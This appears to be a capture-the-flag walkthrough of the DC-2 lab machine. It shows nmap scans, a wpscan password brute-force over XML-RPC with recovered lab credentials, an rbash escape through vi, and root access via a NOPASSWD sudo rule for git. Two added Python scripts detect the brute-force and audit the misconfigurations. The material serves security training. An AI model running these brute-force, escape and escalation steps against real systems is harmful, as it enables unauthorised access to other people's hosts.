[offensive-security] 3. DC-2 box
I. Gathering target information
1. Known information:
- IP: 192.168.245.193
2. Gathered information:
- nmap scan of the open services
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# nmap -p "*" -A 192.168.245.194
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 19:25 CST
Nmap scan report for dc-2 (192.168.245.194)
Host is up (0.30s latency).
Not shown: 8349 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Two ports are open: 80 (HTTP) and 7744 (SSH). We look at the web server first. Visiting it by IP does not work, because the site redirects to http://dc-2, so we need to edit /etc/hosts and map the name dc-2 to the target's IP locally.
Edit hosts:
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# cat /etc/hosts
127.0.0.1 localhost
192.168.245.194 dc-2
After editing, restart the networking service: /etc/init.d/networking restart
The first flag hint is on the home page:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
3. Brute-forcing the WordPress usernames and passwords
It looks like we are meant to brute-force, but the hint also says ordinary wordlists are useless, and the keyword cewl stands out: this tool crawls a website and saves the words it finds as a wordlist. Usage guide: "Kali password attack tools: CeWL usage guide" (码农网, codercto.com)
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# cewl http://dc-2/ -w Desktop/wp2.txt #save the crawled wordlist to wp2.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
Now we have a password list, but we still need to know which usernames exist. Time for wpscan:
┌──(lo0p㉿0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:39:38 2022
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Oct 26 19:40:07 2022
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.614 KB
[+] Data Received: 514.805 KB
[+] Memory used: 207.809 MB
[+] Elapsed time: 00:00:28
Now we also have a username list. Save it on the desktop as user.txt with tom, jerry and admin one per line:
┌──(lo0p㉿0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -U user.txt -P wp2.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:42:16 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
| - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:03:22 <============================================================================================== > (646 / 1121) 57.62% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Oct 26 19:45:55 2022
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 252.957 MB
[+] Elapsed time: 00:03:39
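The XML-RPC password attack wpscan just ran leaves an obvious trace in the web server's access log: hundreds of POST requests to xmlrpc.php from one source in a few minutes. As an added example (not code from the original writeup), this Python check parses Apache combined-format log lines and flags any source that POSTs to xmlrpc.php more than a threshold number of times inside a sliding window; the log lines, addresses and threshold are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access-log format; only the fields the check needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return (ip, timestamp, method, path) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
    return m.group("ip"), ts, m.group("method"), m.group("path")

def detect_xmlrpc_bruteforce(lines, threshold=20, window_seconds=60):
    """Return {ip: peak} for sources that POST to xmlrpc.php more than `threshold`
    times inside any `window_seconds` window: the XML-RPC password-attack pattern."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method == "POST" and path.split("?")[0].endswith("/xmlrpc.php"):
            posts[ip].append(ts)
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged

# Constructed sample log (RFC 5737 addresses): one client hammering xmlrpc.php, one normal visitor.
SAMPLE_LOG = [
    f'192.0.2.10 - - [26/Oct/2022:19:42:{i:02d} +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "WPScan v3.8.20"'
    for i in range(30)
] + [
    '198.51.100.7 - - [26/Oct/2022:19:42:05 +0800] "GET /index.php/feed/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Oct/2022:19:42:09 +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    print(detect_xmlrpc_bruteforce(SAMPLE_LOG))  # {'192.0.2.10': 30}
```

The single pingback-style POST from the ordinary visitor stays below the threshold, so only the scanning client is reported.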
We now have tom's and jerry's passwords and try to log into the admin panel. The site shows no login link, so we find it by directory brute-forcing:
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# dirsearch -u http://dc-2/ -e * -x 403 404
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/dc-2/-_22-10-26_16-51-46.txt
Error Log: /root/.dirsearch/logs/errors-22-10-26_16-51-46.log
Target: http://dc-2/
[16:51:57] Starting:
[16:53:10] 301 - 0B - /index.php -> http://dc-2/
[16:53:16] 200 - 19KB - /license.txt
[16:53:35] 200 - 7KB - /readme.html
[16:53:49] 301 - 299B - /wp-admin -> http://dc-2/wp-admin/
[16:53:50] 200 - 0B - /wp-content/
[16:53:50] 200 - 0B - /wp-config.php
[16:53:50] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[16:53:50] 200 - 1B - /wp-admin/admin-ajax.php
[16:53:50] 302 - 0B - /wp-admin/ -> http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:53:50] 500 - 0B - /wp-content/plugins/hello.php
[16:53:50] 500 - 4KB - /wp-admin/setup-config.php
[16:53:50] 200 - 1KB - /wp-admin/install.php
[16:53:50] 301 - 301B - /wp-content -> http://dc-2/wp-content/
[16:53:50] 500 - 0B - /wp-includes/rss-functions.php
[16:53:50] 200 - 0B - /wp-cron.php
[16:53:50] 200 - 2KB - /wp-login.php
[16:53:50] 302 - 0B - /wp-signup.php -> http://dc-2/wp-login.php?action=register
[16:53:51] 301 - 302B - /wp-includes -> http://dc-2/wp-includes/
[16:53:51] 405 - 42B - /xmlrpc.php
[16:53:53] 200 - 40KB - /wp-includes/
Task Completed
Found the URI: /wp-login.php
After logging into the backend, nothing turned up under tom, but jerry's account shows a flag hint:
If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
This tells us that none of the WordPress exploits will work here, which testing in msf confirmed. So what other entry point is left? Looking back over what we found, SSH is still available. We could brute-force SSH, but first just try tom's and jerry's passwords (jerry's does not work, but tom's logs in):
┌──(lo0p㉿0xlo0p)-[~]
└─$ ssh [email protected] -p 7744
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 26 07:10:05 2022 from 192.168.49.245
tom@DC-2:~$ whoami
-rbash: whoami: command not found
But this is only an rbash shell, and the commands it lets us run are heavily restricted, so we need an rbash escape.
4. rbash escape
Background: "[Penetration testing] --- A brief overview of rbash escape methods" (通地塔's blog, CSDN)
First, see which commands are available:
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ echo /home/tom/usr/bin/*
/home/tom/usr/bin/less /home/tom/usr/bin/ls /home/tom/usr/bin/scp /home/tom/usr/bin/vi
Following the article above, we can use vi to launch bash:
- vi xxx #open the vi interface
- :set shell=/bin/bash
- :shell
Once in bash we still cannot run other commands, because PATH is not set correctly; set it as follows:
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin:/bin/:/usr/bin/
tom@DC-2:~$ whoami
tom
Looking at tom's home directory, we find the flag3 hint:
tom@DC-2:~$ ls
flag3.txt local.txt usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
The hint says we should su from tom to jerry, using the same password wpscan found:
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt h
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
The flag4 hint is in jerry's home directory. The first three lines are just chatter, but the "git" in the last line stands out, so that is where we try privilege escalation.
5. Privilege escalation via git
- Search for SUID binaries (nothing usable found)
jerry@DC-2:~$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
- Check the current sudo privileges
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
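Both footholds on this box, the shell-escape-capable binaries in tom's restricted PATH (vi, less) and jerry's NOPASSWD sudo rule for git, are misconfigurations a host audit should catch before anyone has to rely on the hints. As an added example (not code from the original writeup), this Python script checks an rbash PATH listing and the output of `sudo -l` against a constructed list of binaries known to spawn a shell; the two inputs are copied from the session above.

```python
import os
import re

# Binaries whose documented features let the caller spawn an interactive shell
# (editor :shell, pager !cmd, git's pager/help, find -exec, scripting runtimes).
# Constructed subset for this audit; extend it to match your own policy.
SHELL_CAPABLE = {"vi", "vim", "nano", "less", "more", "man", "git", "find",
                 "awk", "perl", "python", "scp"}

def audit_restricted_path(path_listing):
    """Given the expansion of <rbash PATH dir>/* (space separated), return the
    binaries a restricted user could use to reach an unrestricted shell."""
    names = [os.path.basename(p) for p in path_listing.split()]
    return sorted(n for n in names if n in SHELL_CAPABLE)

SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_rules(sudo_l_output):
    """Parse `sudo -l` output and return (runas, nopasswd, command) for every
    rule whose command can spawn a shell, i.e. is effectively a shell as runas."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for entry in m.group("cmds").split(","):
            parts = entry.split()  # "/usr/bin/git help config" -> keep the path only
            if not parts:
                continue
            cmd = parts[0]
            if cmd == "ALL" or os.path.basename(cmd) in SHELL_CAPABLE:
                findings.append((m.group("runas"), nopasswd, cmd))
    return findings

# Inputs copied from the DC-2 session above.
TOM_PATH_LISTING = "/home/tom/usr/bin/less /home/tom/usr/bin/ls /home/tom/usr/bin/scp /home/tom/usr/bin/vi"
JERRY_SUDO_L = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

if __name__ == "__main__":
    print("rbash PATH escape candidates:", audit_restricted_path(TOM_PATH_LISTING))
    for runas, nopasswd, cmd in audit_sudo_rules(JERRY_SUDO_L):
        print(f"sudo lets jerry run {cmd} as {runas}" + (" without a password" if nopasswd else ""))
```

A rule granting `ALL` is reported as well, since it is at least as permissive as any single shell-capable binary.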
So, as the hint suggested, git is the only way up. We look up git's sudo entry on https://gtfobins.github.io/:
1. sudo git help config
2. type !/bin/bash
Root obtained:
root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt proof.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@DC-2:~# cat proof.txt
0d359f3e1b67060936ce02bada010328